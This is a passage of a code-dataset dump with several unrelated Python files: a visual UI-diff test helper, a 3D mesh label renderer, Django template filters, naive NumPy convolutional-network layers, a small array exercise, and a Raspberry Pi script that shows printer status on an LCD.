with open(folder_csv + \"/bug_coordinates.csv\", \"w\") as csvfile:\n writer = csv.writer(csvfile)\n a = \"path\", \"x_center\", \"y_center\", \"x\", \"y\", \"x1\", \"y1\"\n writer.writerow(a)\n\n # Create frame in diff area\n for c in self.cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n x2 = x + w\n y2 = y + h\n x_center = x + ((x2 - x) / 2)\n y_center = y + ((y2 - y) / 2)\n f = path1, x_center, y_center, x, y, x2, y2\n writer.writerow(f)\n\n # Save image and show report\n if float(self.score) < self.ssim:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img{0}.{1}\".format(time_, self.format)\n )\n cv.imwrite(save_folder + \"/Img{0}.{1}\".format(time_, self.format), img_diff)\n\n # start reading coordinates and saving element from coordinate\n df = pd.read_csv(r\"\" + folder_csv + \"/bug_coordinates.csv\")\n with open(\n folder_csv + \"/bug_co_and_name{0}.csv\".format(str(time.time())),\n \"w\",\n ) as csv_name:\n writer = csv.writer(csv_name)\n a = \"web-page\", \"x_center\", \"y_center\", \"class\", \"id\", \"name\"\n writer.writerow(a)\n\n # Get information from position\n for i in range(len(df)):\n x_center = df.values[i, 1]\n y_center = df.values[i, 2]\n driver = self.seleniumlib.driver\n elements = driver.execute_script(\n \"return document.elementsFromPoint(arguments[0], arguments[1]);\",\n x_center,\n y_center,\n )\n for element in elements:\n e_class = element.get_attribute(\"class\")\n e_id = element.get_attribute(\"id\")\n e_name = element.get_attribute(\"name\")\n f = path1, x_center, y_center, e_class, e_id, e_name\n writer.writerow(f)\n\n score_percen = float(self.score) * 100\n self.robotlib.fail(\"Image has diff: {} %\".format(score_percen))\n else:\n raise AssertionError(\"Bad or not exists path for picture or screen\")\n else:\n raise AssertionError(\"Bad or not exists path for picture or screen\")\n\n\n","sub_path":"WatchUI/WatchUI.py","file_name":"WatchUI.py","file_ext":"py","file_size_in_byte":25745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7318770","text":"from config import *\nfrom meshutil import *\nfrom colorutil import *\nimport gl.glm as glm\nfrom gl.glrender import *\nimport time\nimport cv2 as cv\n\ndef GenSegmentation(modelName, segIdx, patches):\n sampleMeshPath = conf.MeshPath(modelName, 0)\n vertices, faces = LoadMesh(sampleMeshPath)\n centers, vertexAs, faceAs = FurthestPointSample(vertices, faces, patches, 10)\n\n datas = [centers, vertexAs, faceAs]\n types = ['center', 'vertexAs', 'faceAs']\n for i in range(3):\n segPath = conf.SegmentationPath(modelName, segIdx, types[i])\n np.save(segPath, datas[i])\n\ndef GenNewLabel(modelRange, segRange, swiRange, disRange, rotRange, depthAndVertex=True):\n b = ZFAR * ZNEAR / (ZNEAR - ZFAR)\n a = -b / ZNEAR\n\n # preparation\n if depthAndVertex:\n segRange = [-1] + segRange\n segColorMap = GetDistinctColors(NUMPATCH)\n\n renderer = GLRenderer(b'GenNewLabel', FULLSIZE, FULLSIZE, toTexture=True)\n proj = glm.perspective(glm.radians(70), 1.0, ZNEAR, ZFAR)\n for modelName in modelRange:\n vertexColor = None\n for meshIdx in range(conf.meshCnt[modelName]):\n print('Generate label for model {} Mesh {}...'.format(modelName, meshIdx))\n meshPath = conf.GetMeshPath(modelName, meshIdx)\n vertices, faces = LoadMesh(meshPath)\n RegularizeMesh(vertices, modelName)\n faces = faces.reshape([faces.shape[0] * 3])\n vertexBuffer = vertices[faces]\n\n if vertexColor is None:\n vertexColor = GetDistinctColors(vertices.shape[0])\n vertexColorBuffer = (vertexColor[faces] / 255.0).astype(np.float32)\n\n for segIdx in segRange + [-1]:\n # prepare segmentation color\n if segIdx != -1:\n segPath = conf.GetSegmentationPath(modelName, segIdx)\n segmentation = np.load(segPath)\n segColorBuffer = np.zeros([faces.shape[0], 3], np.float32)\n faceColors = segColorMap[segmentation] / 255.0\n segColorBuffer[2::3,:] = segColorBuffer[1::3,:] = segColorBuffer[0::3,:] = faceColors\n\n for swi in swiRange:\n for dis in disRange:\n for rot in rotRange:\n model = glm.identity()\n model = glm.rotate(model, glm.radians(swi - MAXSWI / 2), glm.vec3(0, 1, 0))\n model = glm.translate(model, glm.vec3(0, 0, -dis / 100.0))\n model = glm.rotate(model, glm.radians(rot), glm.vec3(0, 1, 0))\n mvp = proj.dot(model)\n\n viewName = conf.GetViewName(swi, dis, rot)\n if segIdx == -1:\n rgb, z = renderer.draw(vertexBuffer, vertexColorBuffer, mvp.T)\n # save depth view\n depth = ((ZFAR - b / (z - a)) / (ZFAR - ZNEAR) * 255).astype(np.uint8)\n dvPath = conf.GetDepthViewPath(modelName, meshIdx, viewName)\n cv.imwrite(dvPath, depth)\n # save vertex view\n vertexIdx = ImageColor2Idx(rgb, vertices.shape[0] + 1)\n vvPath = conf.GetVertexViewPath(modelName, meshIdx, viewName)\n cv.imwrite(vvPath, vertexIdx)\n else:\n rgb, depth = renderer.draw(vertexBuffer, segColorBuffer, mvp.T)\n # save segmentation view\n seg = ImageColor2Idx(rgb, NUMPATCH + 1)\n svPath = conf.GetSegmentationViewPath(modelName, meshIdx, segIdx, viewName)\n cv.imwrite(svPath, seg)\n\nif __name__ == '__main__':\n pass\n modelRange = ['SCAPE']\n segRange = [i for i in range(1)]\n swiRange = [35]\n disRange = [250]\n rotRange = [i for i in range(0, 360, 15)]\n GenNewLabel(modelRange, segRange, swiRange, disRange, rotRange, True)\n","sub_path":"datagenerate.py","file_name":"datagenerate.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462894875","text":"import sys\nfrom ae.pipeline.ae_pipeline import AEPipeline\n\ndef main():\n # cmd = \"main --config /home/swei20/AE/configs/test_config.json\"\n # sys.argv = cmd.split()\n # print(sys.argv)\n\n p=AEPipeline()\n p.execute()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ae/scripts/run_ae.py","file_name":"run_ae.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"350014120","text":"import datetime\n\nfrom django.template.base import Library\nfrom django.template.defaultfilters import stringfilter\n\nregister = Library()\n\n##################################################\n# Filters\n\n# Dictionary Utilities\n\n@register.filter()\ndef get_item(dictionary, key):\n value = dictionary.get(key)\n return value\n\n# String Utilities\n\n@register.filter(is_safe=True)\ndef concat(value, arg):\n result = str(value) + str(arg)\n return result\n\n@register.filter()\ndef zeropad(value, num_digits):\n \"\"\"\n \"\"\"\n padded = str(value).zfill(num_digits)\n return padded\n\n# Formatters\n\n@register.filter()\ndef timestamp(value):\n try:\n formatted = datetime.datetime.fromtimestamp(value)\n except AttributeError:\n formatted = ''\n return formatted\n\n@register.filter()\ndef phonenumber(value, country='US'):\n \"\"\"Formats a phone number for a country\n \"\"\"\n import phonenumbers\n formatted = phonenumbers.format_number(phonenumbers.parse(value, country), phonenumbers.PhoneNumberFormat.NATIONAL)\n return formatted\n\n@register.filter(is_safe=True)\ndef obfuscate(value):\n \"\"\"Obfuscates a string\n \"\"\"\n from htk.utils.obfuscate import html_obfuscate_string\n result = html_obfuscate_string(value)\n return result\n\n@register.filter(is_safe=True)\ndef obfuscate_mailto(value, text=False):\n \"\"\"Obfuscates a mailto link\n \"\"\"\n from htk.utils.obfuscate import html_obfuscate_string\n email = html_obfuscate_string(value)\n\n if text:\n link_text = text\n else:\n link_text = email\n\n result = '%s' % (\n html_obfuscate_string('mailto:'),\n email,\n link_text,\n )\n return result\n\n# Javascript-related\n\n@register.filter()\ndef jsbool(value):\n js_value = 'true' if bool(value) else 'false'\n return js_value\n\n# Requests\n\n@register.filter()\ndef http_header(value):\n \"\"\"Converts Django HTTP headers to standard format\n e.g.\n HTTP_ACCEPT -> Accept\n HTTP_CACHE_CONTROL -> Cache-Control\n \"\"\"\n parts = value.split('_')\n header_parts = [part.title() for part in parts[1:]]\n formatted = '-'.join(header_parts)\n return formatted\n\n##################################################\n# Tags\n\n@register.simple_tag(takes_context=True)\ndef lesscss(context, css_file_path_base, media=None):\n media = 'media=\"%s\" ' % media if media else ''\n values = {\n 'css_rel' : context.get('css_rel', 'stylesheet'),\n 'css_ext' : context.get('css_ext', 'css'),\n 'css_file_path_base' : css_file_path_base,\n 'media' : media,\n }\n html = '' % values\n return html\n\n@register.simple_tag(takes_context=True)\ndef loadjs(context, js_file_path):\n asset_version = context.get('asset_version')\n if asset_version:\n asset_version_str = '?v=%s' % asset_version\n else:\n asset_version_str = ''\n values = {\n 'js_file_path' : js_file_path,\n 'asset_version_str' : asset_version_str,\n }\n html = '' % values\n return html\n","sub_path":"templatetags/htk_tags.py","file_name":"htk_tags.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607248069","text":"# File: layers.py\n# Description: Neural Networks for computer vision in autonomous vehicles and robotics\n# Environment: PyCharm and Anaconda environment\n#\n# MIT License\n# Copyright (c) 2018 Valentyn N Sichkar\n# github.com/sichkar-valentyn\n#\n# Reference to:\n# Valentyn N Sichkar. Neural Networks for computer vision in autonomous vehicles and robotics // GitHub platform. DOI: 10.5281/zenodo.1317904\n\n\n\n\n# Creating helper functions for dealing with CNN layers\n\n\nimport numpy as np\n\n\n\"\"\"\nDefining function for naive forward pass for convolutional layer.\n\nInput consists of following:\n x of shape (N, C, H, W) - N data, each with C channels, height H and width W.\n w of shape (F, C, HH, WW) - We convolve each input with F different filters,\n where each filter spans all C channels; each filter has height HH and width WW.\n 'cnn_params' is a dictionary with following keys:\n 'stride' - step for sliding,\n 'pad' - zero-pad frame around input.\n\nFunction returns a tuple of (out, cash):\n feature_maps - output data of feature maps of shape (N, F, H', W') where:\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n where,\n N here is the same as we have it as number of input images,\n F here is as number of channels of each N (that are now as feature maps).\n cache - is a tuple of (x, w, b, cnn_params), needed in backward pass.\n \n\"\"\"\n\n\ndef cnn_forward_naive(x, w, b, cnn_params):\n # Preparing parameters for convolution operation\n stride = cnn_params['stride']\n pad = cnn_params['pad']\n N, C, H, W = x.shape\n F, _, HH, WW = w.shape\n\n # Cache for output\n cache = (x, w, b, cnn_params)\n\n # Applying to the input image volume Pad frame with zero values for all channels\n # As we have in input x N as number of inputs, C as number of channels,\n # then we don't have to pad them\n # That's why we leave first two tuples with 0 - (0, 0), (0, 0)\n # And two last tuples with pad parameter - (pad, pad), (pad, pad)\n # In this way we pad only H and W of N inputs with C channels\n x_padded = np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n\n # Defining spatial size of output image volume (feature maps) by following formulas:\n height_out = int(1 + (H + 2 * pad - HH) / stride)\n width_out = int(1 + (W + 2 * pad - WW) / stride)\n # Depth of output volume is number of filters which is F\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output feature maps\n feature_maps = np.zeros((N, F, height_out, width_out))\n\n # Implementing convolution through N input images, each with F filters\n # Also, with respect to C channels\n # For every image\n for n in range(N):\n # For every filter\n for f in range(F):\n # Defining variable for indexing height in output feature map\n # (because our step might not be equal to 1)\n height_index = 0\n # Convolving every channel of the image with every channel of the current filter\n # Result is summed up\n # Going through all input image (2D convolution) through all channels\n for i in range(0, H, stride):\n # Defining variable for indexing width in output feature map\n # (because our step might not be equal to 1)\n width_index = 0\n for j in range(0, W, stride):\n feature_maps[n, f, height_index, width_index] = \\\n np.sum(x_padded[n, :, i:i+HH, j:j+WW] * w[f, :, :, :]) + b[f]\n # Increasing index for width\n width_index += 1\n # Increasing index for height\n height_index += 1\n\n # Returning resulted volumes of feature maps and cash\n return feature_maps, cache\n\n\n\"\"\"\nDefining function for naive backward pass for convolutional layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives.\n cache - is a tuple of (x, w, b, cnn_params) as in 'cnn_forward_naive' function:\n x of shape (N, C, H, W) - N data, each with C channels, height H and width W.\n w of shape (F, C, HH, WW) - We convolve each input with F different filters,\n where each filter spans all C channels; each filter has height HH and width WW.\n 'cnn_params' is a dictionary with following keys:\n 'stride' - step for sliding,\n 'pad' - zero-pad frame around input.\n\nFunction returns a tuple of (dx, dw, db):\n dx - gradient with respect to x,\n dw - gradient with respect to w,\n db - gradient with respect to b.\n \n\"\"\"\n\n\ndef cnn_backward_naive(derivative_out, cache):\n # Preparing variables for input, weights, biases, cnn parameters from cache\n x, w, b, cnn_params = cache\n\n # Preparing variables with appropriate shapes\n N, C, H, W = x.shape # For input\n F, _, HH, WW = w.shape # For weights\n _, _, height_out, weight_out = derivative_out.shape # For output feature maps\n\n # Preparing variables with parameters\n stride = cnn_params['stride']\n pad = cnn_params['pad']\n\n # Preparing gradients for output\n dx = np.zeros_like(x)\n dw = np.zeros_like(w)\n db = np.zeros_like(b)\n\n # It is important to remember that cash has original non-padded input x.\n # Applying to the input image volume Pad frame with zero values for all channels\n # As we have in input x N as number of inputs, C as number of channels,\n # then we don't have to pad them\n # That's why we leave first two tuples with 0 - (0, 0), (0, 0)\n # And two last tuples with pad parameter - (pad, pad), (pad, pad)\n # In this way we pad only H and W of N inputs with C channels\n x_padded = np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n # The same we apply padding for dx\n dx_padded = np.pad(dx, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n\n # Implementing backward pass through N input images, each with F filters\n # Also, with respect to C channels\n # And calculating gradients\n # For every image\n for n in range(N):\n # For every filter\n for f in range(F):\n # Going through all input image through all channels\n for i in range(0, H, stride):\n for j in range(0, W, stride):\n # Calculating gradients\n dx_padded[n, :, i:i+HH, j:j+WW] += w[f, :, :, :] * derivative_out[n, f, i, j]\n dw[f, :, :, :] += x_padded[n, :, i:i+HH, j:j+WW] * derivative_out[n, f, i, j]\n db[f] += derivative_out[n, f, i, j]\n\n # Reassigning dx by slicing dx_padded\n dx = dx_padded[:, :, 1:-1, 1:-1]\n\n # Returning calculated gradients\n return dx, dw, db\n\n\n\"\"\"\nDefining function for naive forward pass for Max Pooling layer.\n\nInput consists of following:\n x as input data with shape (N, C, H, W) - N data, each with C channels, height H and width W.\n 'pooling_params' is a dictionary with following keys:\n 'pooling_height' - height of pooling region,\n 'pooling_width' - width of pooling region,\n 'stride' - step (distance) between pooling regions.\n \nFunction returns a tuple of (pooled_output, cache):\n pooled_output - is output resulted data of shape (N, C, H', W') where:\n H' = 1 + (H + pooling_height) / stride\n W' = 1 + (W + pooling_width) / stride\n where,\n N here is the same as we have it as number of input images,\n C here is as number of channels of each N.\n cache - is a tuple of (x, pooling_params), needed in backward pass.\n\n\"\"\"\n\n\ndef max_pooling_forward_naive(x, pooling_params):\n # Preparing variables with appropriate shapes\n N, C, H, W = x.shape # For input\n\n # Preparing variables with parameters\n pooling_height = pooling_params['pooling_height']\n pooling_width = pooling_params['pooling_width']\n stride = pooling_params['stride']\n\n # Cache for output\n cache = (x, pooling_params)\n\n # Defining spatial size of output image volume after pooling layer by following formulas:\n height_pooled_out = int(1 + (H - pooling_height) / stride)\n width_polled_out = int(1 + (W - pooling_width) / stride)\n # Depth of output volume is number of channels which is C (or number of feature maps)\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output image volume after pooling layer\n pooled_output = np.zeros((N, C, height_pooled_out, width_polled_out))\n\n # Implementing forward naive pooling pass through N input images, each with C channels\n # And calculating output pooled image volume\n # For every image\n for n in range(N):\n # Going through all input image through all channels\n for i in range(height_pooled_out):\n for j in range(width_polled_out):\n # Preparing height and width for current pooling region\n ii = i * stride\n jj = j * stride\n # Getting current pooling region with all channels C\n current_pooling_region = x[n, :, ii:ii+pooling_height, jj:jj+pooling_width]\n # Finding maximum value for all channels C and filling output pooled image\n # Reshaping current pooling region from (3, 2, 2) - 3 channels and 2 by 2\n # To (3, 4) in order to utilize np.max function\n # Specifying 'axis=1' as parameter for choosing maximum value out of 4 numbers along 3 channels\n pooled_output[n, :, i, j] = \\\n np.max(current_pooling_region.reshape((C, pooling_height * pooling_width)), axis=1)\n\n # Returning output resulted data\n return pooled_output, cache\n\n\n\"\"\"\nDefining function for naive backward pass for Max Pooling layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives.\n cache - is a tuple of (x, pooling_params) as in 'max_pooling_forward_naive' function:\n x as input data with shape (N, C, H, W) - N data, each with C channels, height H and width W.\n 'pooling_params' is a dictionary with following keys:\n 'pooling_height' - height of pooling region,\n 'pooling_width' - width of pooling region,\n 'stride' - step (distance) between pooling regions.\n \nFunction returns:\n dx - gradient with respect to x.\n\n\"\"\"\n\n\ndef max_pooling_backward_naive(derivatives_out, cache):\n # Preparing variables with appropriate shapes\n x, pooling_params = cache\n N, C, H, W = x.shape\n\n # Preparing variables with parameters\n pooling_height = pooling_params['pooling_height']\n pooling_width = pooling_params['pooling_width']\n stride = pooling_params['stride']\n\n # Defining spatial size of output image volume after pooling layer by following formulas:\n height_pooled_out = int(1 + (H - pooling_height) / stride)\n width_polled_out = int(1 + (W - pooling_width) / stride)\n # Depth of output volume is number of channels which is C (or number of feature maps)\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output gradient after backward pass of pooling layer\n # The shape is the same with x.shape\n dx = np.zeros((N, C, H, W))\n\n # Implementing backward naive pooling pass through N input images, each with C channels\n # And calculating output pooled image volume\n # For every image\n for n in range(N):\n # For every channel\n for c in range(C):\n # Going through all pooled image by height and width\n for i in range(height_pooled_out):\n for j in range(width_polled_out):\n # Preparing height and width for current pooling region\n ii = i * stride\n jj = j * stride\n # Getting current pooling region\n current_pooling_region = x[n, c, ii:ii+pooling_height, jj:jj+pooling_width]\n # Finding maximum value for current pooling region\n current_maximum = np.max(current_pooling_region)\n # Creating array with the same shape as 'current_pooling_region'\n # Filling with 'True' and 'False' according to the condition '==' to 'current_maximum'\n temp = current_pooling_region == current_maximum\n # Calculating output gradient\n dx[n, c, ii:ii+pooling_height, jj:jj+pooling_width] += \\\n derivatives_out[n, c, i, j] * temp\n\n # Backward pass for pooling layer will return gradient with respect to x\n # Each pooling region will be filled with '0'\n # or derivative if that value was maximum for forward pass\n # print(x[0, 0, 0:2, 0:2])\n # print()\n # print(dx[0, 0, 0:2, 0:2])\n\n # [[ 0.57775955 -0.03546282]\n # [-1.03050044 -1.23398021]]\n\n # [[-0.93262122 0. ]\n # [ 0. 0. ]]\n\n # Returning gradient with respect to x\n return dx\n\n\n\"\"\"\nDefining function for computing forward pass for Affine layer.\nAffine layer - this is Fully Connected layer.\n\nInput consists of following:\n x - input data in form of numpy array and shape (N, d1, ..., dk),\n w - weights in form of numpy array and shape (D, M),\n b - biases in form of numpy array and shape (M,),\n where input x contains N batches and each batch x[i] has shape (d1, ..., dk).\n We will reshape each input batch x[i] into vector of dimension D = d1 * ... * dk.\n As a result, input will be in form of matrix with shape (N, D).\n It is needed for calculation product of input matrix over weights.\n As weights matrix has shape (D, M), then output resulted matrix will be with shape (N, M).\n \nFunction returns a tuple of:\n affine_output - output data in form of numpy array and shape (N, M),\n cache - is a tuple of (x, w, b), needed in backward pass.\n\n\"\"\"\n\n\ndef affine_forward(x, w, b):\n # Cache for output\n cache = (x, w, b)\n\n # Reshaping input data with N batches into matrix with N rows\n N = x.shape[0]\n x = x.reshape(N, -1)\n # By using '-1' we say that number of column is unknown, but number of rows N is known\n # Resulted matrix will be with N rows and D columns\n # Example:\n # x = np.random.randint(0, 9, (2, 3, 3))\n # print(x.shape) # (2, 3, 3)\n # print(x)\n # [[[3 6 5]\n # [6 3 2]\n # [1 0 0]]\n #\n # [[8 5 8]\n # [7 5 2]\n # [2 1 6]]]\n #\n # x = x.reshape(2, -1)\n # print(x.shape) # (2, 9)\n # print(x)\n # [[3 6 5 6 3 2 1 0 0]\n # [8 5 8 7 5 2 2 1 6]]\n\n # Implementing Affine forward pass.\n # Calculating product of input data over weights\n affine_output = np.dot(x, w) + b\n\n # Returning resulted matrix with shape of (N, M)\n return affine_output, cache\n\n\n\"\"\"\nDefining function for computing backward pass for Affine layer.\nAffine layer - this is Fully Connected layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives of shape (N, M),\n cache - is a tuple of (x, w, b):\n x - input data in form of numpy array and shape (N, d1, ..., dk),\n w - weights in form of numpy array and shape (D, M),\n b - biases in form of numpy array and shape (M,).\n\nFunction returns a tuple of (dx, dw, db):\n dx - gradient with respect to x of shape (N, d1, ..., dk),\n dw - gradient with respect to w of shape (D, M),\n db - gradient with respect to b of shape (M,).\n\n\"\"\"\n\n\ndef affine_backward(derivatives_out, cache):\n # Preparing variables for input, weights and biases from cache\n x, w, b = cache\n\n # Implementing backward pass for Affine layer\n # Calculating gradient with respect to x and reshaping to make shape as in x\n dx = np.dot(derivatives_out, w.T).reshape(x.shape)\n # Calculating gradient with respect to w\n # Reshaping input data with N batches into matrix with N rows and D columns\n N = x.shape[0]\n x = x.reshape(N, -1)\n dw = np.dot(x.T, derivatives_out)\n # Calculating gradient with respect to b\n db = np.dot(np.ones(dx.shape[0]), derivatives_out)\n # db = np.sum(derivatives_out, axis=0)\n\n # Returning calculated gradients\n return dx, dw, db\n\n\n\"\"\"\nDefining function for computing forward pass for ReLU layer.\nReLU layer - this is rectified linear units layer.\n\nInput consists of following:\n x - input data of any shape.\n\nFunction returns a tuple of:\n relu_output - output data of the same shape as x,\n cache - is x, needed in backward pass.\n\n\"\"\"\n\n\ndef relu_forward(x):\n # Cache for output\n cache = x\n\n # Implementing ReLU forward pass\n # Numbers that are less than zero will be changed to 0\n relu_output = np.maximum(0, x)\n\n # Returning calculated ReLU output\n return relu_output, cache\n\n\n\"\"\"\nDefining function for computing backward pass for ReLU layer.\nReLU layer - this is rectified linear units layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives of any shape,\n cache - is x, of the same shape as derivatives_out.\n\nFunction returns:\n dx - gradient with respect to x.\n\n\"\"\"\n\n\ndef relu_backward(derivatives_out, cache):\n # Preparing variable for input from cache\n x = cache\n\n # Implementing backward pass for ReLU layer\n # Creating array with the same shape as x\n # Filling with 'True' and 'False' according to the condition 'x > 0'\n temp = x > 0\n # Calculating gradient with respect to x\n dx = temp * derivatives_out\n\n # Backward pass for ReLU layer will return gradient with respect to x\n # Each element of the array will be filled with '0'\n # or derivative if that value in x was more than 0\n\n # Returning calculated ReLU output\n return dx\n\n\n\"\"\"\nDefining function for computing Logarithmic loss and gradient for Softmax Classification.\n\nInput consists of following:\n x - input data of shape (N, C),\n where x[i, j] is score for the j-th class for the i-th input. \n y - vector of labels of shape (N,),\n where y[i] is the label for x[i] and 0 <= y[i] < C.\n\nFunction returns:\n loss - scalar giving the Logarithmic loss,\n dx - gradient of loss with respect to x.\n\n\"\"\"\n\n\ndef softmax_loss(x, y):\n # Calculating probabilities\n probabilities = np.exp(x - np.max(x, axis=1, keepdims=True))\n probabilities /= np.sum(probabilities, axis=1, keepdims=True)\n\n # Getting number of samples\n N = x.shape[0]\n\n # Calculating Logarithmic loss\n loss = -np.sum(np.log(probabilities[np.arange(N), y])) / N\n\n # Calculating gradient\n dx = probabilities\n dx[np.arange(N), y] -= 1\n dx /= N\n\n # Returning tuple of Logarithmic loss and gradient\n return loss, dx\n\n","sub_path":"Codes/Image_Classification/Helper_Functions/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":19156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"188459659","text":"class Solution:\n def __init__(self, nums):\n self.nums = nums\n\n def arrayPairSum(self):\n arr = self.nums\n arr = sorted(arr)\n count = sum(arr[::2])\n return count\n\nif __name__ == \"__main__\":\n nums = [1,4,3,2]\n res = Solution(nums).arrayPairSum()\n print(res)","sub_path":"Array/Array_partition_1.py","file_name":"Array_partition_1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432421062","text":"#!/usr/bin/env python\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Import section:\nimport RPi.GPIO as GPIO\nimport time\nimport subprocess\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Global definitions:\n# Define GPIO to LCD mapping\nLCD_RS = 7\nLCD_E = 8\nLCD_D4 = 25\nLCD_D5 = 24\nLCD_D6 = 23\nLCD_D7 = 18\n\n# Define some device constants\nLCD_WIDTH = 16 # Maximum characters per line\nLCD_CHR = True\nLCD_CMD = False\n\nLCD_LINE_1 = 0x80 # LCD RAM address for the 1st line\nLCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line\n\n# Timing constants\nE_PULSE = 0.0005\nE_DELAY = 0.0005\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Setup:\nsleep = time.sleep\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers\nGPIO.setup(LCD_E, GPIO.OUT) # E\nGPIO.setup(LCD_RS, GPIO.OUT) # RS\nGPIO.setup(LCD_D4, GPIO.OUT) # DB4\nGPIO.setup(LCD_D5, GPIO.OUT) # DB5\nGPIO.setup(LCD_D6, GPIO.OUT) # DB6\nGPIO.setup(LCD_D7, GPIO.OUT) # DB7\n\n#-------------------------------------------------------------------------------\n# Functions:\ndef lcd_init():\n # Initialise display\n lcd_byte(0x33,LCD_CMD) # 110011 Initialise\n lcd_byte(0x32,LCD_CMD) # 110010 Initialise\n lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction\n lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off\n lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size\n lcd_byte(0x01,LCD_CMD) # 000001 Clear display\n time.sleep(E_DELAY)\n\ndef lcd_byte(bits, mode):\n # Send byte to data pins\n # bits = data\n # mode = True for character\n # False for command\n\n GPIO.output(LCD_RS, mode) # RS\n\n # High bits\n GPIO.output(LCD_D4, False)\n GPIO.output(LCD_D5, False)\n GPIO.output(LCD_D6, False)\n GPIO.output(LCD_D7, False)\n if bits&0x10==0x10:\n GPIO.output(LCD_D4, True)\n if bits&0x20==0x20:\n GPIO.output(LCD_D5, True)\n if bits&0x40==0x40:\n GPIO.output(LCD_D6, True)\n if bits&0x80==0x80:\n GPIO.output(LCD_D7, True)\n \n lcd_toggle_enable()\t\t# Toggle 'Enable' pin\n\n # Low bits\n GPIO.output(LCD_D4, False)\n GPIO.output(LCD_D5, False)\n GPIO.output(LCD_D6, False)\n GPIO.output(LCD_D7, False)\n if bits&0x01==0x01:\n GPIO.output(LCD_D4, True)\n if bits&0x02==0x02:\n GPIO.output(LCD_D5, True)\n if bits&0x04==0x04:\n GPIO.output(LCD_D6, True)\n if bits&0x08==0x08:\n GPIO.output(LCD_D7, True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\ndef lcd_toggle_enable():\n # Toggle enable\n time.sleep(E_DELAY)\n GPIO.output(LCD_E, True)\n time.sleep(E_PULSE)\n GPIO.output(LCD_E, False)\n time.sleep(E_DELAY)\n\ndef lcd_string(message,line):\n # Send string to display\n message = message.replace(\"\\n\",\"\")\n message = message.ljust(LCD_WIDTH,\" \")\n lcd_byte(line, LCD_CMD)\n for i in range(LCD_WIDTH):\n lcd_byte(ord(message[i]),LCD_CHR)\n#-------------------------------------------------------------------------------\n# Interrupt Routine:\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# main loop\ndef main():\n\twhile(1):\n\t\tlcd_init()\n\t\ttemp = subprocess.check_output([\"/opt/vc/bin/vcgencmd\",\"measure_temp\"])\n\t\ttemp = temp.replace(\"'\",\"\")\n\t\tlcd_string(\"Rasbperry Pi 3\",LCD_LINE_1)\n\t\tlcd_string(temp,LCD_LINE_2)\n\t\ttime.sleep(0.5)\n\t\n\t\tlcd_string(\"Raspbian Linux\",LCD_LINE_1)\n\t\tlcd_string(\"Ver. 8.0(jessie)\",LCD_LINE_2)\n\t\ttime.sleep(0.5)\n\t\t\n\t\trepeat =100\n\t\twhile repeat:\n\t\t\tprinter_status = subprocess.check_output([\"/srv/Workspace/Print_Server/check_printer.sh\"])\n\t\t\tnjobs = subprocess.check_output([\"/srv/Workspace/Print_Server/count_jobs.sh\"])\n\t\t\ts2 = \"Jobs: \" + njobs\n\t\t\tif printer_status == \"0\\n\":\n\t\t\t\tlcd_string(\"Printer OFF-LINE\",LCD_LINE_1)\n\t\t\telse:\n\t\t\t\tlcd_string(\"Printer ON-LINE\",LCD_LINE_1)\n\t\t\tlcd_string(s2,LCD_LINE_2)\n\t\t\ttime.sleep(1)\n\t\t\trepeat = repeat -1\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Exception\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\tfinally:\n\t\tlcd_byte(0x01, LCD_CMD)\n\t\tlcd_string(\"Finalizando!...\",LCD_LINE_1)\n\t\tGPIO.cleanup()\n#--------+---------+---------+---------+---------+---------+---------+----------\n","sub_path":"3-LCD_basico.py","file_name":"3-LCD_basico.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95353470","text":"from sys import exit\nimport os\nimport pygame\nfrom pygame.locals import *\nimport core.gl as gl\nimport core.fsm as fsm\nimport core.mouse as mouse\nimport core.keyboard as keyboard\nfrom 